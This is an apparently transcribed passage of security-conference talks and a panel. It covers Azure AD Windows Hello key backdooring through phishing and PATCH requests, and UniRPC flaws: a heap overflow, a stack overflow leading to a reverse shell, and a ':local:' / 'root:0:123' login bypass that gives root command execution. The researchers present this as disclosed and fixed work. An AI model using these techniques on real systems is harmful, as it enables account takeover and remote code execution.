basically there we see this key which is the public key so that's the same key that we put in the post request earlier it's just the public key that belongs to the private RSA key that's stored hopefully in TPM and we see this device ID as well so this key belongs to this specific device so it turns out that users can modify their own searchable device keys property and as long as you have a token the Azure AD craft then you can basically modify this and just add new keys as much as you want and this doesn't require MFA because it's just as long as you have a token to modify it it works of course if you have very strict conditional access policies and you require MFA for literally everything then you would still need MFA but often companies have some gaps in their policies they don't require MFA from on-prem VPN ranges or from some trusted devices and then you can basically do this without MFA and basically bypass the whole you need MFA to provision a key because you can just provision the key by writing it to the user object directly so this is a nice bypass for the conditional access MFA there are some prerequisites for this so you will need a device as an attacker which you could either register on the fly if you can get tokens for the device registration service you can also register a device and you also need a valid access token so you will need access token to do this but as long as you have that then you're fine basically so that's also possible with ROTX so I made a gen hello key command that just generates the key and gives you it in the right format and then you just take this JSON blob and you send a patch request creating with this an extra key in there so the only difference between this is that now we do a patch so we have the user's access token we patch their device keys and then we can authenticate with this key without having to do the whole provisioning process normally so just an example of what you can do with this there's a way to do this basically via phishing so that you didn't need any external access I'm assuming that people are familiar with device code phishing I don't know if we have time to explain it but basically it's a technique where you initiate the authentication on a different device than what your user is on so as an attacker you would talk to Azure AD and say hey I want to initialize the device code flow then you phish the user and basically convince them to do the device authentication on their part so it can be done with an email just saying hey go to this website enter this code and authenticate and if you can convince the user to do that then you can get an access token on behalf of the user for the correct API now this token it's already quite powerful because you can do a lot of things with it but with this token we can now also register a new windows hello key and then basically have persistent access to the user's information and basically can get access in any way that we want which is a lot more of course than this single access token that we phish with it so the attacker can register the device register the windows hello keys as backdoor credentials and then from then on the attacker can just use the keys and get a token for whatever they want they can log interactively in the browser as the user and access the user's resources there are some alternative scenarios so you can also abuse this with like normal credential phishing so if you can convince users to logging on your fake websites you can also get a token register the key again if you have access to their device temporarily so if you have malware running on there or they leave their laptop unlocked you can also get the correct tokens and then just create these backdoor credentials and the nice thing is that this also works on other accounts as long as you have permissions to modify them so there's roles in Azure AD that allow you to modify other accounts which include like the user administrator of course global administrator and they can basically create keys on other user objects we'll look a bit more at this in a second so this was purely Azure AD we also can do this with hybrid scenarios and if you want to use windows hello for business in a hybrid scenario then there's different methods with different requirements and different complexities I think the simplest one and also the one that's recommended by Microsoft is the cloud Kerberos trust this doesn't require that much on-prem infrastructure it doesn't require ADFS it doesn't require PKI infrastructure on-prem so this is the recommended way and the easiest way and the nice thing about cloud Kerberos trust is that it basically creates a trust between Active Directory and Azure AD using the Kerberos protocol so if you set this up then basically what it does is it creates a read-only domain controller it's not real one because there's no real server behind it but basically it creates read-only domain controller account which has some Kerberos keys registered and it replicates these keys to Azure AD so when a user authenticates with windows hello and basically Azure AD can give them a ticket, a ticket granting ticket in this case which is signed with these keys of this read-only domain controller and this is what we call a partial TTC because Azure AD doesn't know all the user information that's stored on-prem but it sends a ticket granting ticket with just enough information to authenticate the user to the on-prem domain basically then the user can then exchange this for a full ticket granting ticket and with this full ticket granting ticket they can authenticate to any on-prem resources using Kerberos and if the resources don't use Kerberos then you can also obtain the NT-Hash of the user so then the user can also use NT-Lem authentication by getting the NT-Hash using the Kerberos protocol some technical details again basically when you request a primary refresh token using a windows hello for business key we can obtain the partial TTC we can exchange this for a full TTC that can be used to access Active Directory resources of course this only works for hybrid accounts so the accounts should already exist in the on-prem Active Directory and in Azure AD because otherwise I mean it can send a TGT for that account but if the on-prem doesn't know about the user then it's not going to work and basically this TGT looks like this so we previously saw the TGT response here's the primary refresh token primary refresh token session key and then we also get a ticket granting ticket included in that this is the partial TGT and we can exchange that for a full TGT and this also allows some nice opportunities so because user administrators in Azure AD could provision these keys on user accounts so if you had high privilege Azure AD access you could just create windows hello keys for everybody that you are allowed to modify to provide that you have the normal access right so there's some things in Azure AD prevent like user administrators creating keys on high administrator roles but if you have the correct privileges then you can sign new windows hello keys so you could add back to our credentials to any user you could then also get a PRT for them also get a ticket granting ticket for them and as long as you have connectivity to an on-prem domain controller then you could also authenticate to any on-prem resources the only account this doesn't work for is like domain admin accounts because these have special protections so you could not do this for domain admin accounts but any regular users you could basically by modifying their keys in Azure AD get a ticket granting ticket for them and then move to their identities on-prem last example for this so we request the PRT for a hybrid user so in this case the user has a hybrid account it's a sync user so it exists in Azure AD and on-prem AD using this hello key and a device that we registered so you still always need a device as an attacker and basically we can we get this PRT which also includes the ticket granting ticket we can extract ticket granting ticket from the primary first token data and basically save it in a ccash file so I'm using some impact tools for this and we can also exchange this for a full ticket granting ticket by simply asking for a ticket granting ticket using the partial TGT and what we also can do is recover the NT hash for this user so I could probably give an entire talk about how this protocol works exactly but if you want to read about that there was some nice research done a couple of years ago by Leandro but basically because of this whole setup then if you authenticate with Windows low for business in a cloud Kerberos trust then you can also get the NT hash when you authenticate so as an end result if I am a global admin or user admin in Azure AD I could just provision keys for anybody that I want and if I also have line of sight to the on-prem AD domain controllers I could then also get their NT hashes crack them get their passwords etc etc I still need to upload these tools they're not fully finished yet so this is basically part of my road tools hybrid toolset basically so last part about the disclosure to Microsoft of course I submitted all this to Microsoft because those are quite some sphere vulnerabilities and lateral movement opportunities so I submitted this in October 2022 and basically from then on they acknowledged the issues started working on fixes and basically in February to April 2020 we had a report about the fix timeline it was not always the case that the issues would be fixed before this talk and eventually they fixed most of it before the talk we also had some discussions about whether or not this was an identity bug or another bug and I'll save you that story as well basically the end result is that last week and this week they rolled out the fixes for this and they also added new keys via the searchable device key properties so if you try to do that now it won't work anymore and they now also properly require the NGC MFA to provision a new key via the device registration service you cannot do this with like an old MFA claim that's cached somewhere you need to actually do MFA interactively in order to provision these new keys so getting back to our questions it provides strong phishing resistant MFA a bit questionable I don't fully agree that this is MFA at all I mean it's just a key somewhere and everything about where that key is stored how it's handled it's all pure assumptions I mean you fully trust that the device actually puts it in the TPM Azure AD cannot see whether it's in the TPM or not it doesn't have any data phishing resistant well hopefully now it is definitely before you could actually register a key via phishing so not fully phishing resistant require MFA to provision well that definitely was not the case since we could provision it with just an access token to the API and whether or not you needed MFA for that was purely up to the tenant configuration it's not bound to a specific device so if you can dump the Windows Hello key from one device used with another device just fine the keys are protected by the TPM that still doesn't prevent attackers if they have some form of access to the device from actually using that there's not a story here that I can't talk about yet but that's for our next talk but though it's still more secure than password authentication so it's definitely not that it's completely horrible broken and we should all go back to weak passwords I like Windows Hello it's not perfect there are some improvements now it's hopefully a bit more secure let's try to move away from passwords because well we all know that having secure passwords is still a unsolved problem in our industry so to end all the tools the tools in this talk are based on my road tools framework there are open source I already pushed the Windows Hello features for that so you can play with it yourself and try to push the hybrid tools later this afternoon as well I do have some road tool stickers definitely if you see me walking around then ask me for some and there's no time for questions now but after the next presentation there's Q&A in this room later so I'd be happy to take any questions then or via email or via Twitter or if you see me around then definitely just ask and I'll be happy to answer all right so we'll be back in like 15 minutes with Ron 5 actually 5 so short break hello everyone please have a seat we're gonna go ahead and proceed with the next talk so we have with us Ron here Ron is the lead vulnerability researcher at Rapid7 he in his job he actually does some vulnerability research or deep dives some vulnerabilities that already exist so that we can understand what the hell is happening otherwise he is one of the main organizers of the CTF of the B side San Francisco and he also helps with the CTF in his own town in Winnipeg which is called the long con CTF I don't live in Winnipeg so I've never heard of it he also has a bird so if you want to ask him some really fun question ask about his bird so Ron thank you and go ahead hi everyone thanks for having me back I think my second time speaking here third or fourth time being here so thanks for having me back over and over again so quick introduction as I mentioned I have birds those are clang and sharp so yeah I am a lead security researcher at Rapid7 my job is 50% looking at vulnerabilities that come out that we think are important telling our customers like should you panic, should you patch, should you not worry and the other half is finding vulnerabilities ourselves picking a piece of software like say the one we are talking about today diving into it as deeply as I can and finding all the bugs I can and I can talk about the results of one of those projects you can find me online Yago XA6 is my general alias everywhere if Twitter is still up today it will work otherwise Macedon or GitHub or whatever whatever and I've done lots of volunteer stuff I guess I work at Rapid7 I should mention that because this is going to be a deep dive sort of looking at some vulnerabilities specifically in Rocket Software Uni RPC server I didn't name this software in the title because the vulnerabilities around public might submit this talk I found these back in January submit this talk in I think January and then we disclosed everything in March so it's all out now but at the time I submitted this it wasn't so we're going to look at software called UniData 8.2.4 that was the one they had on their trials page so it's the one I chose it's finding software is often the hard part of these projects and I'm going to talk about a lot of like protocol stuff and show some packet captures and show some like assembly and stuff like that and I'll try to explain everything as I go and just kind of give you an idea of how I approach these kinds of projects one of the questions I got asked by Rocket Software themselves and others is why did you actually choose this? No one's really heard of this software and like it was kind of a personal I won't say Vendetta but a personal project because when I worked at Tenable in like 2010 or so this vulnerability came across my plate a packet header heap overflow and I figured out the protocol back then in like 2010 and thought this looks really interesting and I wrote the check for Nessus then I changed jobs and never came back to it until recently and I thought I really want to go back to this and see the software so I found it and convinced my boss that it was worthwhile despite not being well known software it's apparently typically found on back ends so most large aerospace companies and banks and other companies use this just on the back end so it's not usually internet facing but it's popular so I'm going to talk about what UniRPC is, how it works, stuff like that so basically UniData and Universe and other tools made by this company come with a service called UniRPC Unit Remote Procedure Calls and UniRPC is an RPC server which basically has a list of services and those that execute a user connects on a specific TCP port that I'll mention after and says I want to use this service and it checks its database and says oh I have access to this service here you go and it just gives you a TCP connection to that service and then you talk to that service directly from then on all the communication is done by standard packets and then they send it to the router they have metadata, they have a body we'll see what those details are in a minute so one of the first things I do is look for a tax surface so I install the software I execute the software that usually takes 2 or 3 days because of licensing and because of either the wrong OS or the wrong version of Fedora but when you eventually get it running you can run that stat and see that it listens on a TCP port 31438 which I'm going to forget during a talk but that is the port that is interesting so what services can I actually execute when you install the software it comes with a file called uni RPC services I saw the file I saw it being read by the process and the first instinct I have is to reverse engineer the process to figure out what this file means and if you look at the file I think a lot of fields you can kind of guess from context the first column UDCS looks like a name there are obviously binaries they're in a slash bin directory this star we can guess might be an ACL of some sort protocol is 0 and then 3600 is an hour and seconds so guessing is a timeout so I spent probably a day learning how a process is filled and what the fields mean and everything then when I was running this talk I googled any of the file and it's actually documented so it turns out I should just read the manual I was correct but this is what I often forget to do so one such service in that is UDCerver and I'm just going to choose a service to talk about completely arbitrarily this type for now so on the top line you'll see the entry from that file we just saw it's one of the lines in this file so if you have an entry in that file when a client connects it can send this packet that's here if it's too small to read it's not a big deal this is not super important all the bytes mean but the first packet a client sends will be hey please use the UDCerver service and the uniRPC will parse its file and say is one of our services called UDCerver oh there it is and then it will execute that binary so you can see on the bottom there's a debug log it says found service executing UDCervD obviously if I'm doing an application review I want to see I see the executing I think or can I only execute their stuff in this case I can only execute their binaries but that's definitely a thing I looked at so we've seen this packet capture a couple times let's kind of dive into what it means I want to give sort of a quick overview I have a lot of slides with a lot of packets on them I'm going to skip through them somewhat quickly because I just want to give the idea of how this works not necessarily every single detail then we'll look along the way at the vulnerabilities we found while actually looking at these packets so as far as I can tell UniRPC uses a custom binary pro call but I didn't actually Google it so maybe it's documented I don't know but even in the cases if it was a standard pro call or was documented it's always nice to reverse engineer it from the binary to see if there's anything interesting like how they handle length fields and how is it execute other processes and how is it you know look looking for vulnerabilities are there undocumented header flags stuff like that so this was originally the end of the section but I realized I was going to dive into a bunch so I wanted to put the beginning of the section instead so every message you see will have a 20 byte header which contains the version the size number of parameters stuff like that then there's some metadata which is types so basically the client will say like I'm going to send you a string and int and int and the string and that's what the metadata is I'm going to send you a 10 byte string and then the integer and then the data the actual string integer so just really quickly looking at this that is what you're seeing here is a 20 byte header 16 bytes of metadata and then the rest is the strings we'll see more examples of that so when I'm looking at these kinds of applications I want to look for attack surface where is it parsing packets where is it actually doing the things it's doing so thankfully when it's a Linux binary I can run it in debugger and you see I'm using a gdb debugger which is just built in Linux debugger that most people use in Linux I also hacked the executable to get rid of the forking you'll see in the IPC one shot that just removes the fork command I used to decide about that but it was boring so I put my blog instead so basically I run it in a debugger and I put a breakpoint on the accept command the accept is this call the accept happens or that's this call the accept function that function is called by the in your PC server to accept a new connection so a client connects this accept call will complete and there'll be a new socket created so I want to look at where that happens in the code and there's a little bit of assembly code at the bottom it's not a big deal there's not actually anything too exciting happening one thing I always like is looking at debug messages though like accepted socket is from IP number which tells me that if I can match up that debug message with the two sides back you'll see the same debug message here accepted socket is from IP number so being able to match up things you see in the debug output with things you see in the binary is good but the accept function is not super interesting so I'll move on to where it does get interesting which is receive the first place I want to see is where the connection is accepted the second place I want to look at is where the data comes in so I want to see where the connection is so I want to see where the connection is so I want to see where the connection is so I want to receive that data and then it's going to get parsed so the beginning of what's interesting or what's attackable is going to be what the receive function does so you'll see I run the UniaPC one shot in GDB I put a breakpoint on the receive function then I run it so I'm just receiving data from file descriptor 8 which doesn't really matter a buffer that is at this address doesn't really matter we see it receives 8,216 bytes or less that's an interesting number because it's close to a power of 2 8192 is a power of 2 so it's a power of 2 plus a little bit plus 20 or so which would sort of mean something So I run the BT command, which is backtrace, and that asks the debugger to tell me how do we get here? What function, what function, what function to get us here? And what we see is the main function calls accept connection. I should say, because we have named functions, not memory addresses, we have symbols. And that makes it much, much easier to reverse than if we had to figure out what each function does. But we have accept connection, which calls read packet, which calls read message, which calls read n. Read n reads n bytes. It's called with a function parameter of like a thousand, and then it reads a thousand bytes. That's all read n does. And then read message is what's going to parse the header. So I mentioned there's a 20-byte packet header. These are just a couple examples of code from it. What they're actually doing isn't super important. But when it reads the header, it reads those 20 bytes, and it does checks like compare the first two bytes to 6C. If they're 6C, proceed. If they're not 6C, return a error version of this match. So basically the first one byte has to be 6C. Then the second byte has to be 0102. Then the third and fourth byte are ignored, and so on. So I'm going to look for all these things and what's happening. One of the fields that's interesting, and this is where we're going to get into vulnerability, is the length field. So there's a 32-bit length field in the packet header, and it says the length of the body of this packet is going to be 20 bytes or 100 bytes or 1,000 bytes. And it's going to do some checks on it. First of all, this one where it can... Hard to read my own stuff here. It checks the length of the field. I circled and read. I should see it. So it tests EDI, and EDI is like a variable. It happens to be the length. So it's going to say test the length jump if it's less than or equal to zero. So make sure the length isn't zero and make sure the length isn't negative. That's good because you don't want to... If the client said like, hey, I'm sending you a negative 10 bytes, the server is like, well, doesn't make sense. So it's going to make sure it's not negative. Then it adds 17 to the value, and then it does a second comparison. It compares the length after adding 17 hex to the size of the buffer, which is 2018 by default, but that can change. So something you learn to look for when you're looking for vulnerabilities is doing a check to see if something's above zero, adding something to it, then doing a different check because integer overflows are a thing. And if your size happens to be very, very high, like 7 f f f f f f f, and you add 17 to it, the size is now negative. So the size was positive, you add 17, and now is it less than 2018? If it's now negative, yeah, it's less than 2018 by a lot. And that's what we can do. So if we send the size of 7 f f f f f f f and then print it, we see 2.14 billion, I think, which is the highest integer. Then down on the bottom, it adds 17 to it. We then print RIX, and now it's negative 2.1 billion, which means that it's wrapped around, and now it's negative. So if we send a body length of 7 f f f f f f f, when it goes back to the receive function, it's going to try to receive 2.1 billion bytes into a buffer, that's 2,000 bytes. 2 billion is higher than 2,000, so that overflows and it overwrites memory and causes a heap corruption. So we call this vulnerability CV 2023, 28501. It's a likely exploitable heap overflow that I didn't bring the exploit for because it seems really hard, and they were easier ones. So that's one vulnerability. This slide I debated keeping or not because it's not really an interesting vulnerability, but it's a silly mistake that they made. So one of the bytes in the packet header is compression. If it's set to 1, the packet's compressed. If it's set to 0, it's not compressed. The compression function they have is called LZ4, something, something, something. LZ4 decompressed safe. So I tried to make test data for this. I tried to LZ4 compress that in different ways, and I never did figure out how to make data that actually worked, which is sort of funny. I wrote a blog that's linked to the bottom. I'll send you these slides afterwards if you want to check these links out. But I made the program generate its own compressed data and then I was able to test this and all that. What's interesting is if you send invalid data, if the LZ4 compressed safe returns a failure, there's only one thing and it's either success or failed. It's not why it failed, which means if it failed, the program assumes that the compressed data was too long and it allocates more memory and tries again. If it fails again, it allocates more memory and tries again. And it'll keep on reallocating more and more memory until it tries to allocate, like, 18 billion billion bytes and then fail. So that's just a really silly DLL service just from forgetting to check buffer sizes. It's not exploitable, but just kind of a weird vulnerability. There's also an encryption field. So we looked at the length field. We looked at the compression field. There's also an encryption field telling the server that if this field is set to non-zero, the packet's encrypted. And by encrypted, I mean XORed by one. So, basically, if the encryption's on, the encryption key is either two or one depending on the version, and then each byte is XORed with that key, and that's encrypting. As far as I can tell, the real clients and servers never use this, but, like, my math supply module I wrote for this eventually does because, I mean, why not keep the payloads off the clear text? So once the message is read, we talked about the header. There's all these different header fields, and I have a list of them that I should have put earlier. But after the header is finished, it then reads the body. The body of the message is much, much, much more complex than the header. So rather than, like, going through the assembly and all these different notes I made and all this junk, we're just going to look at the packet captures and figure things out from the packets. So this is where I'm going to actually look at the traffic on the wire. At the top, you'll see the packets we see before, where you say, please connect me to UD server, and then at the bottom you see the version number come back. It's basically a success. What you're seeing is a header, metadata, and then freeform body. We'll see what each of those mean. So this is the header. We looked at this a couple of times. But the version of it has to be 6C. The body length has to be above zero. LZ4 is a compression field. Encryption is an encryption field. There are several padding fields that can be anything. I set them to, like, ABCD in my implementations. There's a number of arguments, and then there's a length of the data. Data length is not really used. I think that's a... It's parsed and processed, but it's not used by anything. So I think it's legacy. But arg count is what's interesting, because it's how many arguments are being sent. So here's some examples. I'm going to go through these pretty quickly, but this is where you can match up the packets you see in Wireshark to the packet, to the structure I gave. If you actually want to implement this protocol or something, you can probably go back and use these slides, but I'm going to skip through them pretty quick. So after the header, there's argument definitions. So you'll have zero or more fields that's a base number of arguments. So this packet has two arguments. The first argument is type two, which is a string, and the second argument is type zero, which is an integer. So a string and integer are the metadata, and then the actual data section, you'll see the string is UDServer, the YYY is just padding, and then the integer is 539, which is hex for 1337. That's the secure flag, and sometimes it's required to be set, but you can set yourself, so it doesn't actually secure anything. So this just shows what I just showed in a graphical way. Then the actual data section of packets is just the data. So we saw in this, we have a type two, which is a string. The string is UDServer. I just talked about this. And when the server responds, it does the same thing. The server says I have two arguments. The first one's a string. The second one's an integer. The second one's an integer. The third one's a string. This is just a string, and if the server doesn't exist, it will be something that's not zero. That's just showing the same stuff. So TLDR. This is what the messages look like. I didn't want to draw too much, but I did do an open source implementation of this whole thing. This is from something I called LibNeptune. And LibNeptune is a implementation of the library that's in Ruby, So, if you ever want to write something for Metasploit, involving rocket, you need data, you can. My name, I named Neptune after the escape rocket, if anyone plays it, because rocket, Neptune. So I'm going to show you three messages that do a thing that's interesting, which is run an OS command. Then I'm going to show you two ways to bypass all the checks that we're going to see, and then we're going to call it done. So here is a conversation. The first one is, please use a service. We're going to use a service, UD admin. I think I've decided why we chose UD admin, but I don't know where it went, so we'll see when it turns up. Basically this says, please use UD admin. My secure flag is 1337, which means I'm 1,300 times secure. Then when you do that, it's going to run the UD server process, and the UD server process wants you to authenticate. It says, before you can do anything, please send me the packet code F, which is 15, which says authenticate. And the username, string, and the password string. The username string you'll see is plain text, it's R-O-N, and then Y-Y-Y-Y, because I just pad with Y, so I can see what's going on. And then the integer is 15, the string username is run, the string password is 969098. And it's encrypted, quotation marks. So I send the username, I send the password, and it simply responds with one integer value zero. One integer value zero says authentication is successful. If you failed, it would be a non-zero integer. Then you can run a command. So opcode 6 means OS command. Once you've authenticated, and you have to authenticate as a Linux user on the machine, so you're basically as good as SSHing, you can tell it to run a command. So it's like 150 opcodes. I've only tested the one, because once I run a command, I don't need the rest. So basically you send the opcode 6, and then you send it a string with what to run. In this example, I just do who am I, and in the response, it returns run. It returns negative 2 for the command result, which I'm not sure why it's negative 2, but it is, and then the string run. So with the username password, we can run code, is what I'm saying. This is why I chose a service. I'm going to put the site somewhere. So why UD Admin Server? It's because I ran strings and saw OS command. And once I see OS command, I'm just going to use that one, because it sounds like fun. It's also the biggest. It's by far bigger than the other processes. It's 300 kilobytes, the rest are like 20 to 60. So it's going to be the most interesting, the most code, and has OS command. Who can resist? So once you connect, as I said, you need to send authentication. You either send the code 15, or you send the code, I think, 6? No, 8. If you send 8, it returns coming soon, and then closes the connection. It never came soon. But if you give it 15, it affinites you. It'll look at your username as a string, and then stir copy it into a buffer. Uh-oh. If you send a name of 200 letter a's, you can overflow your return address and send your return address to all a's. This is what we called CV 2023, 28502. But now I'm lazy, and stir copy doesn't like null bytes. And I do like null bytes, because I want to return to memory address. So I want to write easy exploits. Let's look at the password. The password is also stir copied into a buffer. After a stir copies it and terminates it null, it then calls a function called RPC encrypt. You would think the RPC encrypt would encrypt the packet. And it, well, it extrovers a byte, or negates each byte. It's like encryption. It basically goes through each byte in the password and knots it. So 00 becomes FF, 01 becomes FE, and so on and so on and so on. That's not really encryption. What it does mean is I can now use null bytes in an exploit. So basically we send, I can't remember how many return address offset is, but we send like 150 letter a's, then a return address. There's actually a return address in the software that will run whatever's on the stack, which if your exploit dev is really nice, all it does is just pass whatever's in the RSP into the system call, and then run it. So we can run like a reverse shell, like netcat, we can do whatever. So this is the actual form of CV 2023, 20502, which is basically a stack overflow which lets us execute arbitrary code. And we wrote this exploit, and we released this exploit, and it's out there. But it's still hard. You have to over return addresses and do a bunch of work. So let's say we don't overflow the fields, which takes all the willpower I have to not overflow them. But if we don't overflow them, we get to a call called impersonate user. Impersonate user takes the username and password as parameters. So if we look at the code for it, this is in the library now. It's not in the main executable. The impersonate user just calls do logon user, basically, and nothing else. Do logon user is interesting, because it checks if the username is colon local colon. It looks for a very specific username, and if it matches that username, then it calls sturcher to find a colon. Then it calls sturcher again if I have second colon in the password. So you have a username colon local colon and a password of A colon B colon C. Something special happens. Something special means I get code execution. So basically, after it parses it into A colon B colon C, it passes B, the second field, into stir to L, which converts to the integer. So the number 1337 becomes the integer 1337. It also passes a third field into stir to L. And then it does a couple of checks. It passes the first field into get PWNM. Get PWNM looks up a username on the local Linux system. So if I pass it wrong, it returns the data for wrong. If it passes in root, it returns the data for root. So if the first field of the password is wrong, this will succeed. Get PWNM. The second thing it does is compares the second field to the user ID of that user. So if the username is wrong, it checks if the middle field was 1,000. If the username was root, it checks the middle field is 0. And if that matches, it keeps going. The third field, it only checks if it's non-zero. If it's 0, it fails. If it's 1, 2, 3, it works. So basically, with the username colon local colon, the password wrong colon 1,000 colon 1,000 will succeed if the wrong account exists and has UID 1,000. Root colon 0, colon 1, 2, 3 will always work, because root is basically always there and always UID 0. So here's a session. We connect to the UD admin service. We say, please connect to username local. Password is encrypted, but it's root colon 0, colon 1, 2, 3. And then you say, please run the command ID dash A and it returns UID 0 root. The nice thing about this, too, is your root. It doesn't draw privileges. So basically, this is a real code as root. So here's some of the exploit code I wrote. This is the proof of concept that's in the Neptune repo. Yeah, you just pass the username local and the password root colon 0, colon 1, 2, 3. There's also many exploit modules for this. So just kind of wrapping up and summarizing the work we did, we ended up with nine CVEs for different things. Two of them we wrote full exploits for. The other seven, we either crash them or demonstrate them or whatever. Some stuff like memory exhaustion is like the OS. The weak encryption was kind of vague. But I thought it was a pretty good outcome all in all. These are just screenshots of metasploit. Metasploit has modules for the two vulnerabilities I mentioned. Yeah, and that is pretty much the end. I think I have one minute left. Perfect. I think we do a question session in 10 minutes. And other than that, that's how to link to the slides. Feel free to use it. Feel free to reach out to me on Twitter, Macedon, GitHub, whatever. And thank you for coming. Hello, everyone. Hello, everyone. Welcome to the Vulnerability Research Panel. We still have Derkian and Ron with us here. So I'm going to start things off with a very important question. Will your birds ever have a vulnerability logo? They don't have a vulnerability logo, but I can imagine them discovering a vulnerability. It was actually, I was playing a computer game a few weeks ago called Valheim, and it turns out there's a hidden shortcut, Control-F3, to hide the UI. And I was holding Control, and my bird jumped and landed on the F3 key, and I couldn't figure out where the UI went. I had to, like, Google it. So they're definitely little fuzzers. All right, let's go with a more serious question. Let's go with Derkian. How do you choose a target or a system that you're interested in and would like to research? Oh, it's a good question. Usually I just, so I get a lot of my ideas from actually doing real world assessments. Look at a client environment. Dale explains to me, oh, we're using this and this, and I'm like, oh, I didn't know that was possible. Like, how did you configure it is? And then my head starts, the gears start turning, and I'm like, oh, so this is how it works. So I start researching the protocols involved, right, I set it up myself, and you just figure out, like, how it works, and if there's anything I can do that like defeats the assumptions that they made. So I mostly look for logic books. I'm not really into the binary exploitation that's different kind of skill set. So yeah, I usually look at real world things that have not been researched yet that much, but are used by a lot of people. So that things that are relevant. So that's also why I focus a lot on Microsoft vulnerabilities because like, like 90% of the enterprises in the world are using it. So it's very big, it's relevant, and that's usually how I progress in my things. And I have a very long mental to do of all the things that I want to look at someday if I have time. So no shortage of research subjects for me yet. And Ron, do you use other meaningful ways of choosing targets except personal vendetta? Personal vendetta is about half of it. Yeah, at Rapid7, we don't have a ton of direction on what we're supposed to research, but our general approach is things that are meaningful to like our customers and to the internet at large. So we're often looking for trends, like what's been popular in the past year? There was a vulnerability a couple months ago in a specific piece of software, and we take a reactive approach sometimes. We heard about the vulnerability, we researched it, we built a POC and we released details. And I thought this is an interesting class of software. I don't wanna say specifically what it is right now, but it was interesting class of software. I wonder if there's other things that do the same thing. And it's like it was network perimeter. So it was something that is pointing to the internet and was semi-popular as a class of software. I thought I'm gonna dig into this and see what other software exists. So I picked out three, I installed them all, and I found one that was like, it felt worse than the other ones. So I chose it and found some vulnerabilities that I reported now. Usually if you do this often enough, you get like a spidey sense. If you look at a software and it's like, this is probably gonna end up vulnerable. It's not always tell-tale science, but I've added with a lot of products. Like you look at it's five minutes, you decompile a bit of the code, and you're like, ah, this is gonna be fun. Or it's like, well, this looks quite all right. Maybe I can find something, but it's not gonna be like golden thing. So I'll put it on the backlog a little bit. We'll take a moment to talk about time-framing a little bit later. But you mentioned that you do have a backlog or backlog of stuff that you would like to dive into without spoiling anything, but maybe getting hints out about what looks to be interesting for people that would like to research some stuff. Do you have stuff in your backlog that you might never get to, but you know will be interesting that you could point people out to look at? So the things that I already know are interesting, they'll go to the top of my list usually. I mean, in general with Azure AD research and with cloud research in general, I felt like the past few years I was one of the only ones doing it. Nowadays, luckily the more people are looking at it, but it's still like, a lot of things are just not looked at as much by the Pentes community, research community. There's still a lot of focus on on-prem AD while like everyone is already migrating to the cloud already migrated to the cloud or it's working with this hybrid things. And I think there's still a lot of things to look at there. No specific topics in general, but like if you look at what is implemented attack-wise, tools-wise, then just go build on that. And I'm sure there's a lot of things that are still with vulnerabilities, with holes, with flaws, things you could explain better because there's not much blogs about it yet. So I think there's quite a lot left to do in that area. Any extra input? I feel like I take the opposite approach, where I don't really have a backlog. I finish a project and then go, oh crap, what do I do next? And I kind of like look at Shodan and look at other sources. I look at what was interesting. We keep a list of the top vulnerabilities of the year and look back at those and try to get inspiration. But really I have trouble coming up with the next project every time. All right, you've just spoke about Shodan. Do you use some special tools or are there particular tools that you really enjoy finding a use case for? So you're building on whatever research you're doing and you have the opportunity to do something and you're just impressed by this tool that does something really nice. Are there some little secrets there? I don't really have an answer for that. For tools, I tend to be really bad at learning new tools. So I tend to stick with things I learned 10, 15 years ago. So I wind up using like the old versions of WinDebug and GDB with no plugins and stuff like that. And I feel like I use Vim as my editor and I have a million plugins, a million configs, but I'm hacky. I'm just using like a monochrome GDB terminal. I really feel like I should learn tools that aren't just the basic crap. Like I said, I'm not really a binary researcher. Sometimes if I look at Windows internals, I have to look at else as I like the... If it's .NET, at least there are some tools like decompile tools that I really appreciate, that can decompile things into sort of human readable codes. Otherwise, if I have to use Gidra, I use 64 DBG, they're quite essential if you really start to looking at the Windows internals part, how else has handles data, TPM stuff. So those tools in general, the rest I prefer to just use the web things like BIRB as a proxy. That's all I do with BIRB. I just use it as a glorified proxy. But it's a very useful tool to have, yeah. I know you've developed a lot of tools by yourself. Is it for the learning curve, or is it really just you want your own spin on some stuff that exists, or is it just the technology preference for building them in Python? I always want to understand how things work, and I think the only way to know how things work is to implement them yourself. Not for everything, but for most things. Like if I take someone else's code, like if you just pick it, the one time I did that was when I wrote something, I used someone else's code, and I didn't look at it too much, and there were some vulnerabilities in there, and I was like, well, from now on, I'll just write my own code, thanks. But basically, if you use other people's codes without knowing the journey that they went through in order to analyze it, then I don't think you will get to these branches when you're like, okay, so this step, it does this, but what if I change something here and do something different, what will that do? And with most of my research, like the whole Windows Hello Flow as well, it's just separate steps. Of course, Windows does them all at once, but if you implement them in a library, then you can do all the steps like in a different order with different parameters, some basic fuzzing. So you just, yeah, if you pull it apart, then you can really analyze it, and if you want to do these things, then you will need your own tools because if you just, like, if I have to modify the Windows memory in order to inject new certificates, that's gonna be really inefficient. So usually I write my own tools for every research project that I do, and that brings me to understanding the implementation, finding flaws in that, and I also like to have tools to make my life easier. Like, a lot of my research that I do is also with my own tools that I build to automate sign-in with Selenium, so I don't have to enter the codes all the time, copy-based passwords, it just does that all for me, so it's also making my own life easier. You know, I have a similar process. Kind of two-fold answer to that one. Sometimes I find it really hard to read academic papers and to understand, like, big concepts, but if I write them myself or implement them, I can usually get my head around them eventually. So I wrote a tool many years ago for padding Oracle text, for example, and for hash extensions, even better one. I wrote a tool called Hash Extender, and, like, I ran this in a CTF and I was like, there's no good tools for this and I don't understand how it works. I wonder if I could figure this out. So, like, a mixture of reading white papers and trying code, eventually I kind of got the concept and then I was able to write my own tool that others use now, which I'm kind of proud of. The other part is one of my favorite things to work on is network protocols. And typically, besides, like, Netcat, there's no good tools for, like, testing protocols because I'm just building it as I go. So I'll figure out the headers 20 bytes and then if this looks like a length field, so what if I send the wrong length field or this looks like a version? What if I send the wrong version? Or this looks like an opcode. If I send every opcode, like, zero, two, two, 55, and, like, as I figure out what things mean, I'll just build functions and build tools and at the end I have, like, a library of sorts for this protocol and then I'll try to clean it up and merge into Manusploit and then we'll have, like, protocol support in Manusploit for it. So I find it useful as a reverse engineering thing as well. Speaking of protocol reversing, we have a question from the public here. Asking if you have any particular tools or special tricks, I'm guessing. When you're looking at reversing some opaque protocols that you don't know nothing about, I know in your talk, you talked about re-implementing a client which often helps a lot and we saw you use GDB, IDA, and Wireshark, I'm guessing. Anything else in your toolbox? I think that's largely it and, like, Ruby, like, writing code for it. One possible, my favorite thing to do is to use a packet capture tool, capture a conversation and try to identify things. When you look at network protocols, similar things usually happen. There's usually a length field near the beginning or at the beginning of each packet and you want to find a length field just because TCP is a stream, you need to 